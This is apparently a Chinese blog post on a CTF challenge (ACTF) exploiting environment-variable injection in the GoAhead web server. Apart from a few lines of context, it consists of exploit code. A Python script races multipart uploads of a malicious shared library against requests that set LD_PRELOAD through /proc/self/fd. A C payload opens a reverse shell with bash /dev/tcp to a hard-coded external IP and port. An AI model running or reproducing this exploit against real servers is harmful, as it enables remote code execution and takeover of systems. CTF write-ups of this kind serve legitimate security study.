看了下居然一个月没有更新博客了，赶快把最近的比赛搬出来水一水
ACTF 居然在我期末周考试，然后我还要预习那些考试科目，所以阿，只做了一题，V&N 的烨师傅尝试做第二题，思路有了但是没有时间做。

这一题呢主要是通过 GoAhead 环境变量注入
在做题之前呢，搜了下，找到了一篇相关的 Vulhub 漏洞复现的文章
具体的就这些
Github-exploits
exp.py

import requests, random
from concurrent import futures
from requests_toolbelt import MultipartEncoder
hack_so = open('hack.so','rb').read()
def upload(url):
    m = MultipartEncoder(
        fields = {
            'file':('1.txt', hack_so,'application/octet-stream')
        }
    )
    r = requests.post(
        url = url,
        data=m,
        headers={'Content-Type': m.content_type}
    )
def include(url):
    m = MultipartEncoder(
        fields = {
            'LD_PRELOAD': '/proc/self/fd/7',
        }
    )
    r = requests.post(
        url = url,
        data=m,
        headers={'Content-Type': m.content_type}
    )
def race(method):
    url = 'http://localhost:10218/cgi-bin/hello'
    if method == 'include':
        include(url)
    else:
        upload(url)
def main():
    task = ['upload','include'] * 1000
    random.shuffle(task) # 
    with futures.ThreadPoolExecutor(max_workers=5) as executor:
        results = list(executor.map(race, task))
if __name__ == "__main__":
    main()

				

					
				
				

					
				
				

					
				
				

					
				
			

hack.c

#include 
#include 
#include 
__attribute__ ((__constructor__)) void aaanb(void)
{
    unsetenv("LD_PRELOAD");
    system("touch /tmp/success");
    system("/bin/bash -c 'bash -i >& /dev/tcp/150.158.58.29/7777 0>&1'");
}

				

					
				
				

					
				
				

					
				
				

					
				
			

hack.so
github 上自行提取